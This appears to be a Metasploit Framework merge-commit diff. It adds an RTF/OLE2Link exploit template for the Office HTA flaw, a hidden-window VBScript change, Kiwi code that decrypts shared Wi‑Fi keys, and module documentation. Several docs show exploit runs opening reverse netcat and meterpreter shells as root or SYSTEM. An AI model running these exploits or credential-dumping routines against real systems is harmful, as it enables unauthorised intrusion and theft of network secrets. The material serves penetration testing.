Merge remote-tracking branch 'upstream/pr/8299' into land-8267-

bug/bundler_fix
Brent Cook 2017-08-20 17:43:56 -05:00
commit d5a5321a8c
21 changed files with 1203 additions and 60 deletions

View File

@ -31,7 +31,7 @@ GIT
PATH PATH
remote: . remote: .
specs: specs:
metasploit-framework (4.14.13) metasploit-framework (4.14.15)
actionpack (~> 4.2.6) actionpack (~> 4.2.6)
activerecord (~> 4.2.6) activerecord (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
@ -172,7 +172,7 @@ GEM
factory_girl_rails (4.8.0) factory_girl_rails (4.8.0)
factory_girl (~> 4.8.0) factory_girl (~> 4.8.0)
railties (>= 3.0.0) railties (>= 3.0.0)
faraday (0.12.0.1) faraday (0.12.1)
multipart-post (>= 1.2, < 3) multipart-post (>= 1.2, < 3)
ffi (1.9.18) ffi (1.9.18)
filesize (0.1.1) filesize (0.1.1)
@ -187,7 +187,7 @@ GEM
multi_json (~> 1.11) multi_json (~> 1.11)
os (~> 0.9) os (~> 0.9)
signet (~> 0.7) signet (~> 0.7)
grpc (1.2.2) grpc (1.2.5)
google-protobuf (~> 3.1) google-protobuf (~> 3.1)
googleauth (~> 0.5.1) googleauth (~> 0.5.1)
i18n (0.8.1) i18n (0.8.1)

View File

@ -0,0 +1,33 @@
{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0
{\info
{\author Microsoft}
{\operator Microsoft}
}
{\*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}
{
{\object\objautlink\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101
{\*\objclass Word.Document.8}
{\*\objdata 0105000002000000
090000004f4c45324c696e6b000000000000000000000a0000
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d
6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
MINISTREAM_DATA
0105000000000000}
{\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324 }}}}
{\*\datastore }
}

View File

@ -1,4 +1,5 @@
<script language="VBScript"> <script language="VBScript">
window.moveTo -4000, -4000
Set %{var_shell} = CreateObject("Wscript.Shell") Set %{var_shell} = CreateObject("Wscript.Shell")
Set %{var_fso} = CreateObject("Scripting.FileSystemObject") Set %{var_fso} = CreateObject("Scripting.FileSystemObject")
For each path in Split(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%"),";") For each path in Split(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%"),";")

View File

@ -0,0 +1,50 @@
## Vulnerable Application
Chargen is a debugging and measurement tool and a character generator service. Often `chargen` is included in `xinetd`,
along with `echo`, `time`, `daytime`, and `discard`.
While its possible to run chargen on TCP, the most common implementation is UDP.
The following was done on Kali linux:
1. `apt-get install xinetd`
2. edit `/etc/xinetd.d/chargen` and changed `disabled = yes` to `disabled = no`. The first one is for `TCP` and the second is for `UDP`.
3. Restart the service: `service xinetd restart`
## Verification Steps
1. Install and configure chargen
2. Start msfconsole
3. Do: `use auxiliary/scanner/chargen/chargen_probe`
4. Do: `run`
## Scenarios
A run against the configuration from these docs
```
msf > use auxiliary/scanner/chargen/chargen_probe
msf auxiliary(chargen_probe) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(chargen_probe) > set verbose true
verbose => true
msf auxiliary(chargen_probe) > run
[*] 127.0.0.1:19 - Response: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk
%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl
&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklm
'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmn
()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmno
)*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnop
*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopq
+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqr
,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrs
-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrst
./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
[+] 127.0.0.1:19 answers with 1022 bytes (headers + UDP payload)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -0,0 +1,93 @@
## Description
This module allows us to scan through a series of IP Addresses and provide details whether anonymous access is allowed or not in that particular FTP server. By default, anonymous access is not allowed by the FTP server.
## Vulnerable Application
### Install ftp server on Kali Linux:
1. ```apt-get install vsftpd```
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
```
local_enable=YES
write_enable=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
```
3. **IMPORTANT:** For allowing anonymous access set ```anonymous_enable=YES```
4. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
5. ```service vsftpd start```
### Installing FTP for IIS 7.5 in Windows:
#### IIS 7.5 for Windows Server 2008 R2:
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
6. Click Next.
7. On the Confirm Installation Selections page, click Install.
8. On the Results page, click Close.
#### IIS 7.5 for Windows 7:
1. On the taskbar, click Start, and then click Control Panel.
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
3. Expand Internet Information Services, then FTP Server.
4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
5. Click OK.
#### Enabling anonymous login on IIS
1. Open IIS Manager and navigate to the level you want to manage. ...
2. In Features View, double-click Authentication.
3. On the Authentication page, select Anonymous Authentication.
4. In the Actions pane, click Enable to use Anonymous authentication with the default settings.
## Verification Steps
1. Do: ```use auxiliary/scanner/ftp/anonymous```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
### On vsFTPd 3.0.3 on Kali
```
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(anonymous) > set RPORT 21
RPORT => 21
msf auxiliary(anonymous) > exploit
[+] 127.0.0.1:21 - 127.0.0.1:21 - Anonymous READ (220 (vsFTPd 3.0.3))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(anonymous) >
```
## Confirming using NMAP
```
root@kali:~# nmap -sV -sC 127.0.0.1 -p 21
Starting Nmap 7.40SVN ( https://nmap.org ) at 2017-04-24 22:58 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000035s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
Service Info: OS: Unix
root@kali:~#
```

View File

@ -0,0 +1,80 @@
## Description
This module allows us to scan through a series of IP Addresses and provide details about the version of ftp running on that address.
## Vulnerable Application
### Install ftp server on Kali Linux:
1. ```apt-get install vsftpd```
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
```
local_enable=YES
write_enable=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
```
3. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
4. ```service vsftpd start```
### Installing FTP for IIS 7.5 in Windows:
#### IIS 7.5 for Windows Server 2008 R2:
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
6. Click Next.
7. On the Confirm Installation Selections page, click Install.
8. On the Results page, click Close.
#### IIS 7.5 for Windows 7:
1. On the taskbar, click Start, and then click Control Panel.
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
3. Expand Internet Information Services, then FTP Server.
4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
5. Click OK.
## Verification Steps
1. Do: ```use auxiliary/scanner/ftp/ftp_version```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
### On vsFTPd 3.0.3 on Kali
```
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(ftp_version) > set RPORT 21
RPORT => 21
msf auxiliary(ftp_version) > exploit
[*] 127.0.0.1:21 - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_version) >
```
## Confirming using NMAP
```
root@kali:~# nmap -sV 127.0.0.1 -p21
Starting Nmap 7.40SVN ( https://nmap.org ) at 2017-04-24 23:11 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000035s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: Unix
root@kali:~#
```

View File

@ -0,0 +1,53 @@
## Vulnerable Application
This module exploits a command injection vulnerability in the [wePresent WiPG-1000](http://wepresentwifi.com/wipg1000.html) device. A description of the exploited vulnerability is available in section 3.4 of [this advisory](https://www.redguard.ch/advisories/wepresent-wipg1000.txt).
The latest vulnerable firmware version is 2.0.0.7. Newer versions can be downgraded to [the older firmware](http://www.wepresentwifi.com/assets/downloads/wipg1000/wePresent.1000.2.0.0.7.nad.zip).
There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method checks for the presence of the `rdfs.cgi` file and whether it contains the string `https://www.redguard.ch/advisories/wepresent-wipg1000.txt`. All known versions of this file on the device are vulnerable to this command injection.
Manual exploitation would equate to browsing to the URI `http://<ip>/cgi-bin/rdfs.cgi` and entering the String `; command;` in the input field and submitting the form.
Version 2.0.0.7 was confirmed vulnerable, and firmware 2.2.3.0 was released to fix the exploit.
## Verification Steps
1. Make sure the device is running.
2. Start msfconsole.
3. Do: ```use exploit/linux/http/wipg1000_cmd_injection```
4. Do: ```set payload cmd/unix/reverse_netcat```
5. Do: ```set RHOST <ip>```
6. Do: ```set LHOST <ip>```
7. Do: ```exploit```
8. You should get a shell.
## Options
**PAYLOAD**
The `generic`,`netcat` and `openssl` payload types are valid.
## Scenarios
### Firmware 2.0.0.7
The following is an example run getting a shell:
```
msf > use exploit/linux/http/wipg1000_cmd_injection
msf exploit(wipg1000_cmd_injection) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(wipg1000_cmd_injection) > set RHOST 192.168.3.3
RHOST => 192.168.3.3
msf exploit(wipg1000_cmd_injection) > set LHOST 192.168.3.216
LHOST => 192.168.3.216
msf exploit(wipg1000_cmd_injection) > check
[*] 192.168.3.3:80 The target appears to be vulnerable.
msf exploit(wipg1000_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.3.216:4444
[*] Sending request
[*] Command shell session 1 opened (192.168.3.216:4444 -> 192.168.3.3:50893) at 2017-04-20 16:11:48 +0200
id
uid=0(root) gid=0(root) groups=0(root),10(wheel)
```

View File

@ -0,0 +1,68 @@
Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Virtusl Basic for Application scripting langauage.
FireEye detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.
The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.
## Vulnerable Application
- Windows Vista Service Pack 2
- Windows Vista x64 Edition Service Pack 2
- Windows 7 for 32-bit Systems Service Pack 1
- Windows 7 for x64-based Systems Service Pack 1
- Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
- Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 for Itanium-Based Systems Service Pack 2
- Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
- Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
- Windows Server 2012
- Windows Server 2012 (Server Core installation)
- Microsoft Office 2007 Service Pack 3
- Microsoft Office 2013 Service Pack 1 (32-bit editions)
- Microsoft Office 2013 Service Pack 1 (64-bit editions)
- Microsoft Office 2010 Service Pack 2 (32-bit editions)
- Microsoft Office 2010 Service Pack 2 (64-bit editions)
- Microsoft Office 2016 (32-bit edition)
- Microsoft Office 2016 (64-bit edition)
## Verification Steps
1. Start msfconsole
2. Do: ```use exploit/windows/fileformat/office_word_hta```
3. Do: ```set payload [PAYLOAD NAME]```
3. Do: ```exploit```
## Demo
```
$ msfconsole
msf > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(office_word_hta) > set lhost 192.168.146.1
lhost => 192.168.146.1
msf exploit(office_word_hta) > set srvhost 192.168.146.1
srvhost => 192.168.146.1
msf exploit(office_word_hta) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.146.1:4444
[+] msf.doc stored at /Users/wchen/.msf4/local/msf.doc
[*] Using URL: http://192.168.146.1:8080/default.hta
[*] Server started.
```
After you have the malicious doc file and servers ready, copy the doc file onto the victim machine,
and open it with Microsoft Office Word. You should receive a session:
```
[*] Sending stage (957487 bytes) to 192.168.146.145
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2017-04-24 16:00:49 -0500
```

View File

@ -0,0 +1,73 @@
## Vulnerable Application
[Disk Sorter Enterprise](http://www.disksorter.com) versions up to v9.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/5ffae2c1a4b2165e0dd2a8e37765ef0e-disksorterent_setup_v9.5.12.exe).
## Verification Steps
1. Install a vulnerable Disk Sorter Enterprise
2. Start `Disk Sorter Enterprise` service
3. Start `Disk Sorter Enterprise` client application
4. Navigate to `Tools` > `Disk Sorter Options` > `Server`
5. Check `Enable Web Server On Port 80` to start the web interface
6. Start `msfconsole`
7. Do `use exploit/windows/http/disksorter_bof`
8. Do `set RHOST ip`
9. Do `check`
10. Verify the target is vulnerable
11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
12. Do `set LHOST ip`
13. Do `exploit`
14. Verify the Meterpreter session is opened
## Scenarios
###Disk Sorter Enterprise v9.5.12 on Windows 7 SP1
```
msf exploit(disksorter_bof) > show options
Module options (exploit/windows/http/disksorter_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 172.16.0.9 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.0.20 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Disk Sorter Enterprise v9.5.15
msf exploit(disksorter_bof) > exploit
[*] Started reverse TCP handler on 172.16.0.20:4444
[*] Sending request...
[*] Sending stage (957487 bytes) to 172.16.0.9
[*] Meterpreter session 1 opened (172.16.0.20:4444 -> 172.16.0.9:59371) at 2017-04-24 14:46:52 +0100
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : pt_PT
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
```

View File

@ -0,0 +1,68 @@
This module allows you to upload a binary file, and automatically execute it.
## Vulnerable Application
The following platforms are supported:
* Windows
* Linux
* OS X
## Verification Steps
1. Prepare for an executable file you wish to upload and execute.
2. Obtain a session from the target machine.
3. In msfconsole, do ```use post/multi/manage/upload_exec```
4. Set the ```LFILE``` option
5. Set the ```RFILE``` option
6. Set the ```SESSION``` option
7. ```run```
## Options
**LFILE**
The file on your machine that you want to upload to the target machine.
**RFILE**
The file path on the target machine. This defaults to LFILE.
## Demo
```
msf > use post/multi/manage/upload_exec
msf post(upload_exec) > show options
Module options (post/multi/manage/upload_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
LFILE yes Local file to upload and execute
RFILE no Name of file on target (default is basename of LFILE)
SESSION yes The session to run this module on.
msf post(upload_exec) > set lfile /tmp/
lfile => /tmp/
msf post(upload_exec) > set lfile /tmp/msg.exe
lfile => /tmp/msg.exe
msf post(upload_exec) > set rfile C:\\Users\\sinn3r\\Desktop\\msg.exe
rfile => C:\Users\sinn3r\Desktop\msg.exe
msf post(upload_exec) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/windows WIN-6NH0Q8CJQVM\sinn3r @ WIN-6NH0Q8CJQVM 192.168.146.1:4444 -> 192.168.146.149:50168 (192.168.146.149)
msf post(upload_exec) > set session 1
session => 1
msf post(upload_exec) > run
[-] Post interrupted by the console user
[*] Post module execution completed
```

View File

@ -214,14 +214,14 @@ module Metasploit
parsed_data[:machine_type] = read_pascal_string(body, machine_type_offset) parsed_data[:machine_type] = read_pascal_string(body, machine_type_offset)
parsed_data[:versions] = read_array(body, afp_versions_offset) parsed_data[:versions] = read_array(body, afp_versions_offset)
parsed_data[:uams] = read_array(body, uam_count_offset) parsed_data[:uams] = read_array(body, uam_count_offset)
# skiped icon # skipped icon
parsed_data[:server_flags] = parse_flags(server_flags) parsed_data[:server_flags] = parse_flags(server_flags)
parsed_data[:signature] = body.unpack("@#{server_signature_offset}H32").first parsed_data[:signature] = body.unpack("@#{server_signature_offset}H32").first
network_addresses = read_array(body, network_addresses_offset, true) network_addresses = read_array(body, network_addresses_offset, true)
parsed_data[:network_addresses] = parse_network_addresses(network_addresses) parsed_data[:network_addresses] = parse_network_addresses(network_addresses)
# skiped directory names # skipped directory names
#Error catching for offset issues on this field. Need better error ahndling all through here #Error catching for offset issues on this field. Need better error handling all through here
begin begin
parsed_data[:utf8_server_name] = read_utf8_pascal_string(body, utf8_servername_offset) parsed_data[:utf8_server_name] = read_utf8_pascal_string(body, utf8_servername_offset)
rescue rescue

View File

@ -30,7 +30,7 @@ module Metasploit
end end
end end
VERSION = "4.14.13" VERSION = "4.14.15"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev' PRERELEASE = 'dev'
HASH = get_hash HASH = get_hash

View File

@ -379,6 +379,57 @@ class Kiwi < Extension
content.join('') content.join('')
end end
#
# Access and parse a set of wifi profiles using the given interfaces
# list, which contains the list of profile xml files on the target.
#
# @return [Hash]
def wifi_parse_shared(wifi_interfaces)
results = []
exec_cmd('"base64 /in:off /out:on"')
wifi_interfaces.keys.each do |key|
interface = {
:guid => key,
:desc => nil,
:state => nil,
:profiles => []
}
wifi_interfaces[key].each do |wifi_profile_path|
cmd = "\"dpapi::wifi /in:#{wifi_profile_path} /unprotect\""
output = exec_cmd(cmd)
lines = output.lines
profile = {
:name => nil,
:auth => nil,
:key_type => nil,
:shared_key => nil
}
while lines.length > 0 do
line = lines.shift.strip
if line =~ /^\* SSID name\s*: (.*)$/
profile[:name] = $1
elsif line =~ /^\* Authentication\s*: (.*)$/
profile[:auth] = $1
elsif line =~ /^\* Key Material\s*: (.*)$/
profile[:shared_key] = $1
end
end
interface[:profiles] << profile
end
results << interface
end
exec_cmd('"base64 /in:on /out:on"')
results
end
# #
# List all the wifi interfaces and the profiles associated # List all the wifi interfaces and the profiles associated
# with them. Also show the raw text passwords for each. # with them. Also show the raw text passwords for each.

View File

@ -72,7 +72,8 @@ class Console::CommandDispatcher::Kiwi
'kerberos_ticket_list' => 'List all kerberos tickets (unparsed)', 'kerberos_ticket_list' => 'List all kerberos tickets (unparsed)',
'lsa_dump_secrets' => 'Dump LSA secrets (unparsed)', 'lsa_dump_secrets' => 'Dump LSA secrets (unparsed)',
'lsa_dump_sam' => 'Dump LSA SAM (unparsed)', 'lsa_dump_sam' => 'Dump LSA SAM (unparsed)',
'wifi_list' => 'List wifi profiles/creds', 'wifi_list' => 'List wifi profiles/creds for the current user',
'wifi_list_shared' => 'List shared wifi profiles/creds (requires SYSTEM)',
} }
end end
@ -303,37 +304,50 @@ class Console::CommandDispatcher::Kiwi
end end
# #
# Dump all the wifi profiles/credentials # Dump all the shared wifi profiles/credentials
#
def cmd_wifi_list_shared(*args)
interfaces_dir = '%AllUsersProfile%\Microsoft\Wlansvc\Profiles\Interfaces'
interfaces_dir = client.fs.file.expand_path(interfaces_dir)
files = client.fs.file.search(interfaces_dir, '*.xml', true)
if files.length == 0
print_error('No shared WiFi profiles found.')
else
interfaces = {}
files.each do |f|
interface_guid = f['path'].split("\\")[-1]
full_path = "#{f['path']}\\#{f['name']}"
interfaces[interface_guid] ||= []
interfaces[interface_guid] << full_path
end
results = client.kiwi.wifi_parse_shared(interfaces)
if results.length > 0
display_wifi_profiles(results)
else
print_line
print_error('No shared wireless profiles found on the target.')
end
end
true
end
#
# Dump all the wifi profiles/credentials for the current user
# #
def cmd_wifi_list(*args) def cmd_wifi_list(*args)
results = client.kiwi.wifi_list results = client.kiwi.wifi_list
if results.length > 0 if results.length > 0
results.each do |r| display_wifi_profiles(results)
table = Rex::Text::Table.new(
'Header' => "#{r[:desc]} - #{r[:guid]}",
'Indent' => 0,
'SortIndex' => 0,
'Columns' => [
'Name', 'Auth', 'Type', 'Shared Key'
]
)
print_line
r[:profiles].each do |p|
table << [p[:name], p[:auth], p[:key_type], p[:shared_key]]
end
print_line(table.to_s)
print_line("State: #{r[:state]}")
end
else else
print_line print_line
print_error('No wireless profiles found on the target.') print_error('No wireless profiles found on the target.')
end end
print_line true
return true
end end
@@creds_opts = Rex::Parser::Arguments.new( @@creds_opts = Rex::Parser::Arguments.new(
@ -401,6 +415,30 @@ class Console::CommandDispatcher::Kiwi
protected protected
def display_wifi_profiles(profiles)
profiles.each do |r|
header = r[:guid]
header = "#{r[:desc]} - #{header}" if r[:desc]
table = Rex::Text::Table.new(
'Header' => header,
'Indent' => 0,
'SortIndex' => 0,
'Columns' => [
'Name', 'Auth', 'Type', 'Shared Key'
]
)
print_line
r[:profiles].each do |p|
table << [p[:name], p[:auth], p[:key_type] || 'Unknown', p[:shared_key]]
end
print_line(table.to_s)
print_line("State: #{r[:state] || 'Unknown'}")
end
end
def check_is_domain_user(msg='Running as SYSTEM, function will not work.') def check_is_domain_user(msg='Running as SYSTEM, function will not work.')
if client.sys.config.is_system? if client.sys.config.is_system?
print_warning(msg) print_warning(msg)

View File

@ -22,10 +22,17 @@ class MetasploitModule < Msf::Auxiliary
If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does
not have the MS17-010 patch. not have the MS17-010 patch.
If the machine is missing the MS17-010 patch, the module will check for an
existing DoublePulsar (ring 0 shellcode/malware) infection.
This module does not require valid SMB credentials in default server This module does not require valid SMB credentials in default server
configurations. It can log on as the user "\" and connect to IPC$. configurations. It can log on as the user "\" and connect to IPC$.
}, },
'Author' => [ 'Sean Dillon <sean.dillon@risksense.com>' ], 'Author' =>
[
'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0
'Luke Jennings' # DoublePulsar detection Python code
],
'References' => 'References' =>
[ [
[ 'CVE', '2017-0143'], [ 'CVE', '2017-0143'],
